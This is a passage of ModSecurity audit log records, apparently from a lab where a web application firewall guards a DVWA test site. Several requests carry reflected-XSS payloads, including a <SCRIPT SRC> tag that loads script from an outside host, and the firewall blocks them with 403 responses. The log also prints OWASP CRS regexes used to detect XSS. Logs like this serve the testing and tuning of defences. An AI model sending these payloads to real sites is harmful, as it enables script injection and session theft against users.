REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcznH8AAQEAAAkYuE0AAAAD\"]"],"stopwatch":{"p1":348,"p2":1326,"p3":73,"p4":405,"p5":72,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:40 --0400","transaction_id":"WRczwH8AAQEAAAkZ0BEAAAAE","remote_address":"192.168.75.145","remote_port":56768,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_d/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1603","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_d/\"] [unique_id \"WRczwH8AAQEAAAkZ0BEAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":514,"p2":2666,"p3":111,"p4":777,"p5":97,"sr":108,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:40 --0400","transaction_id":"WRczwH8AAQEAAAkVV4kAAAAA","remote_address":"192.168.75.145","remote_port":56770,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_d/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1603","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_d/\"] [unique_id \"WRczwH8AAQEAAAkVV4kAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":653,"p2":2435,"p3":104,"p4":520,"p5":85,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:50 --0400","transaction_id":"WRczyn8AAQEAAAmHBJQAAAAF","remote_address":"192.168.75.145","remote_port":56772,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_d/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRczyn8AAQEAAAmHBJQAAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":722,"p2":2335,"p3":181,"p4":457,"p5":81,"sr":170,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:50 --0400","transaction_id":"WRczyn8AAQEAAAmHBJUAAAAF","remote_address":"192.168.75.145","remote_port":56772,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_d/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRczyn8AAQEAAAmHBJUAAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":505,"p2":2245,"p3":125,"p4":389,"p5":77,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:27:10 --0400","transaction_id":"WRcz3n8AAQEAAAkW4RsAAAAB","remote_address":"192.168.75.145","remote_port":56774,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: '';!--\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: '';!--\\\\\\\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcz3n8AAQEAAAkW4RsAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":693,"p2":3265,"p3":0,"p4":0,"p5":220,"sr":31,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:28:26 --0400","transaction_id":"WRc0Kn8AAQEAAAkXs@cAAAAC","remote_address":"192.168.75.145","remote_port":56776,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fxss.rocks%2Fxss.js%3E%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT SRC=http://xss.rocks/xss.js> found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <SCRIPT found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 23)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 23 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity 